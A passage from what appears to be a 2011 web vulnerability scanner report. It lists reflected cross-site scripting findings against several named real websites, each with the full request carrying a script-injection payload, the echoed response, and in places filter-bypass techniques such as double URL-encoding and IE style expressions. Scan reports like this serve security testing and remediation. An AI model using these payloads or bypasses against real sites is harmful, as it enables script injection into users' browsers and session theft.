The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9b33"><script>alert(1)</script>3a01f5b1865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /product_info.php?products_id=495&d9b33"><script>alert(1)</script>3a01f5b1865=1 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:33:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14048

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="product_info.php?products_id=495&d9b33"><script>alert(1)</script>3a01f5b1865=1&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.41. http://store.mandriva.com/product_info.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4974"><script>alert(1)</script>0d8cba98511d21e95 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4974\"><script>alert(1)</script>0d8cba98511d21e95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /product_info.php?products_id=495&action=add_pr/d4974"><script>alert(1)</script>0d8cba98511d21e95oduct&id%5B24%5D=88&products_id=495 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/product_info.php?products_id=495
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.2.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 14:43:06 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14039

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=495&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
<a href="product_info.php?products_id=495&action=add_pr/d4974\"><script>alert(1)</script>0d8cba98511d21e95oduct&id=Array&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.42. http://store.mandriva.com/product_info.php [products_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.mandriva.com
Path:   /product_info.php

Issue detail

The value of the products_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ef39"><script>alert(1)</script>4f532f5a012 was submitted in the products_id parameter. This input was echoed as 7ef39\"><script>alert(1)</script>4f532f5a012 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /product_info.php?products_id=4957ef39"><script>alert(1)</script>4f532f5a012 HTTP/1.1
Host: store.mandriva.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.mandriva.com/g/style/reset-fonts-grids.css
Cookie: osCsid=baf29fe3beb0b63ae0b0d6dbef6b77e6; __utma=1.1215541348.1305469631.1305469631.1305469631.1; __utmb=1.1.10.1305469631; __utmc=1; __utmz=1.1305469631.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 14:29:15 GMT
Server: Apache-AdvancedExtranetServer/2.0.53 (Mandriva Linux/PREFORK-9.4.102mdk) mod_ssl/2.0.53 OpenSSL/0.9.7e PHP/4.3.10
X-Powered-By: PHP/4.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 14179

<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
<link rel="canonical" href="/product_info.php?products_id=4957&currency=EUR&language=english" />
<meta http-equiv="Content-Type" content="text
...[SNIP]...
<a href="product_info.php?products_id=4957ef39\"><script>alert(1)</script>4f532f5a012&currency=USD" title="Switch prices to US$">
...[SNIP]...

3.43. http://tvgids.upc.nl/scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tvgids.upc.nl
Path:   /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9b123<script>alert(1)</script>57ab9101622 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /scheduleApi/api/Channel/7J%7C6s%7C7G%7C7K%7C7L/events/NowAndNext.json?optionalProperties=Channel.url%2CChannel.logoIMG%2CEvent.url&order=startDateTime&batchSize=2&batch=0&callback=jsonp_16787609b123<script>alert(1)</script>57ab9101622 HTTP/1.1
Host: tvgids.upc.nl
Proxy-Connection: keep-alive
Referer: http://www.upc.nl/upclive/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 Apple
Date: Sun, 15 May 2011 15:42:16 GMT
Server: Apache
cache-control: private
cache-control: no-cache
cache-control: no-store
cache-control: must-revalidate
cache-control: max-age=0
expires: Thu, 05-May-2011 08:47:07 GMT
pragma: no-cache
content-length: 5350
Content-Type: application/json

jsonp_16787609b123<script>alert(1)</script>57ab9101622 ([[{"channel":{"id":"7J","_type":"Channel","name":"Nederland 1","logoIMG":"/media/pc/epg_upc/nl/channel_logos/ned1.gif","url":"/TV/Guide/Channel/Nederland+1/"},"endDateTime":"2011-05-15T16:00Z","_type
...[SNIP]...

3.44. http://webchat.rockliffe.com:9090/webchat/live [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webchat.rockliffe.com:9090
Path:   /webchat/live

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload f5b88<script>alert(1)</script>d45944dbf30 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webchat/live?action=isAvailablef5b88<script>alert(1)</script>d45944dbf30&workgroup=mailsite@workgroup.rockliffe.com HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=179611303

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 217

<b>Fastpath Servlet</b><hr><br>Content Type: null<br>Content Encoding: UTF-8<p><b>Parameters:</b><ul><li>workgroup=mailsite@workgroup.rockliffe.com<li>action=isAvailablef5b88<script>alert(1)</script>d45944dbf30</ul>
...[SNIP]...

3.45. http://www.allvoip.gr/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allvoip.gr
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 657e2--><script>alert(1)</script>c53ac8578f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?657e2--><script>alert(1)</script>c53ac8578f5=1 HTTP/1.1
Host: www.allvoip.gr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,34234

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:17:50 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: TEMPCOOKIE=CookieOn; expires=Sun, 15-May-2011 16:17:50 GMT
Set-Cookie: osCsid=nu0foff71uhnmo7bun7b31jg31; path=/; domain=allvoip.gr
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 123847

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="LTR" lang="el">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-7">
<meta name="title" http-e
...[SNIP]...
<a href="http://allvoip.gr/products_new.php?657e2--><script>alert(1)</script>c53ac8578f5=1&op=list&action=buy_now&products_id=580&osCsid=nu0foff71uhnmo7bun7b31jg31">
...[SNIP]...

3.46. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ef5b"><script>alert(1)</script>0c5092af384 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9ef5b"><script>alert(1)</script>0c5092af384=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:36 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/?9ef5b"><script>alert(1)</script>0c5092af384=1">
...[SNIP]...

3.47. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 63ede<script>alert(1)</script>dcf44148064 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?63ede<script>alert(1)</script>dcf44148064=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:43 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>dcf44148064=1">http://www.ekkows.0479228880.com/?63ede<script>alert(1)</script>dcf44148064=1</a>
...[SNIP]...

3.48. http://www.ekko.ws/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b00e5"><script>alert(1)</script>ee8ef911b0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b00e5"><script>alert(1)</script>ee8ef911b0d=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://shops.oscommerce.com/directory/goto,41852

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1847


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/?b00e5"><script>alert(1)</script>ee8ef911b0d=1" frameborder="0">
...[SNIP]...

3.49. http://www.ekko.ws/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd28"><script>alert(1)</script>3166a746867 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2cd28"><script>alert(1)</script>3166a746867 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/2cd28"><script>alert(1)</script>3166a746867" frameborder="0">
...[SNIP]...

3.50. http://www.ekko.ws/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56495<script>alert(1)</script>e3a7c8ec4bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico56495<script>alert(1)</script>e3a7c8ec4bd HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:37 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1865


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>e3a7c8ec4bd">http://www.ekkows.0479228880.com/favicon.ico56495<script>alert(1)</script>e3a7c8ec4bd</a>
...[SNIP]...

3.51. http://www.ekko.ws/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34900"><script>alert(1)</script>1964fc5b40d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico34900"><script>alert(1)</script>1964fc5b40d HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:27:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1871


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/favicon.ico34900"><script>alert(1)</script>1964fc5b40d">
...[SNIP]...

3.52. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f6ae"><script>alert(1)</script>f51bcf7e764 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5f6ae"><script>alert(1)</script>f51bcf7e764=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:40 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<a href="http://www.ekkows.0479228880.com/favicon.ico?5f6ae"><script>alert(1)</script>f51bcf7e764=1">
...[SNIP]...

3.53. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc71b<script>alert(1)</script>08cfc6baade was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?bc71b<script>alert(1)</script>08cfc6baade=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1874


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
</script>08cfc6baade=1">http://www.ekkows.0479228880.com/favicon.ico?bc71b<script>alert(1)</script>08cfc6baade=1</a>
...[SNIP]...

3.54. http://www.ekko.ws/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ekko.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e3f"><script>alert(1)</script>bc79ec97915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?71e3f"><script>alert(1)</script>bc79ec97915=1 HTTP/1.1
Host: www.ekko.ws
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 15:25:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1880


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="nl" xml:lang="nl">

<
...[SNIP]...
<iframe src="http://www.ekkows.0479228880.com/favicon.ico?71e3f"><script>alert(1)</script>bc79ec97915=1" frameborder="0">
...[SNIP]...

3.55. http://www.grics.qc.ca/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a was submitted in the REST URL parameter 1. This input was echoed as 24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico24543%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%252241aebbf9b7a HTTP/1.1
Host: www.grics.qc.ca
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=x2wj5mnzn01z4mrxvxtfxe2t; __utmz=30083305.1305465382.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30083305.861242077.1305465382.1305465382.1305465382.1; __utmc=30083305; __utmb=30083305.2.10.1305465382

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Content-Length: 9121
Date: Sun, 15 May 2011 13:25:54 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
   <HEAD>
       <title>404 - Page non trouv..e</title>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
...[SNIP]...
<A href="mailto:Web@grics.qc.ca?subject=Page introuvable&amp;body=Ref.: favicon.ico24543"style="x:expr/**/ession(alert(1))"41aebbf9b7a">
...[SNIP]...

3.56. http://www.grics.qc.ca/fr/produits/eleve-jeune/gpi.aspx [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grics.qc.ca
Path:   /fr/produits/eleve-jeune/gpi.aspx

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9976%2522style%253d%2522x%253aexpr%252f%252a%252a%252fession%2528alert%25281%2529%2529%25229fc951766a6 was submitted in the REST URL parameter 4. This input was echoed as a9976"style="x:expr/**/ession(alert(1))"9fc951766a6 in the application's response.

